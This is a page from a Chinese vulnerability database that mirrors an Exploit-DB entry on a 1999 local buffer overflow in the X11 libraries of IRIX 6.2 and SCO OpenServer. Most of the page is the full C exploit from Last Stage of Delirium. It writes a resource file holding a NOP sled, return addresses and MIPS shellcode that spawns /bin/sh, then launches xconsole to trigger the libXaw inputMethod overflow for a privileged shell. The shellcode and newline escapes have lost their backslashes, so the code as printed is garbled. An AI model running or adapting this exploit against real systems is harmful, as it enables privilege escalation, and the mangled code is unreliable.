SCO Open Server 5.0.5 / IRIX 6.2 ibX11/X11 Toolkit/Athena Widget Library

SCO Open Server 5.0.5 / IRIX 6.2 ibX11/X11 Toolkit/Athena Widget Library – Local Buffer Overflow

漏洞ID	1053434	漏洞类型
发布时间	1999-12-20	更新时间	1999-12-20
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Multiple	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/19684

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

source: http://www.securityfocus.com/bid/884/info

SCO Openserver and SGI IRIX (6.2 confirmed, possibly others) are vulnerable to several buffer overflows in various shared libraries related to the X window system. This means that all programs which link to these libraries could be vulnerable to exploitation through buggy library calls. The vulnerable libraries are:

LibX11
LibXt
LibXaw
LibXmu

This vulnerability may be similar to serious X library overflows, in our database as Bugtraq ID 237 (published in August, 1997) and the Sun X problems archived in our database as Bugtraq ID 238 (published in May, 1999). 

/*## copyright LAST STAGE OF DELIRIUM nov 1998 poland        *://lsd-pl.net/ #*/
/*## libxaw.so inputmethod                                                   #*/

#include <fcntl.h>

#define NOPNUM 500
#define ADRNUM 500
#define PCHNUM 500

char shellcode[]=
    "x04x10xffxff"    /* bltzal  $zero,<shellcode>    */
    "x24x02x03xf3"    /* li      $v0,1011             */
    "x23xffx01x14"    /* addi    $ra,$ra,276          */
    "x23xe4xffx08"    /* addi    $a0,$ra,-248         */
    "x23xe5xffx10"    /* addi    $a1,$ra,-240         */
    "xafxe4xffx10"    /* sw      $a0,-240($ra)        */
    "xafxe0xffx14"    /* sw      $zero,-236($ra)      */
    "xa3xe0xffx0f"    /* sb      $zero,-241($ra)      */
    "x03xffxffxcc"    /* syscall                      */
    "/bin/sh"
;

char jump[]=
    "x03xa0x10x25"    /* move    $v0,$sp              */
    "x03xe0x00x08"    /* jr      $ra                  */
;

char nop[]="x24x0fx12x34";

main(int argc,char **argv){
    char buffer[10000],adr[4],pch[4],*b,*envp[2];
    int i,fd;

    printf("copyright LAST STAGE OF DELIRIUM nov 1998 poland  //lsd-pl.net/n");
    printf("libxaw.so inputmethod for irix 6.2 IP:17,19,20,21,22nn");

    if(argc!=2){
        printf("usage: %s xserver:displayn",argv[0]);
        exit(-1);
    }

    *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+8300+1000+200+12976;
    *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+8300+500+200+32732;

    envp[0]="XENVIRONMENT=resource";
    envp[1]=0;

    strcpy(buffer,"*text*international:    truen");
    strcat(buffer,"*shellext*inputMethod:  ");
    b=buffer+strlen(buffer);
    for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    *b++='n';

    fd=open("resource",O_CREAT|O_WRONLY,0666);
    write(fd,buffer,strlen(buffer));
    close(fd);

    execle("/usr/bin/X11/xconsole","lsd","-display",argv[1],0,envp);
}

相关推荐: Xylogics Annex ping CGI程序缓冲区溢出漏洞

Xylogics Annex ping CGI程序缓冲区溢出漏洞漏洞ID 1207320 漏洞类型缓冲区溢出发布时间 1998-07-25 更新时间 1998-07-25 CVE编号 CVE-1999-1070 CNNVD-ID CNNVD-199807…

文章版权归作者所有，未经允许请勿转载。

THE END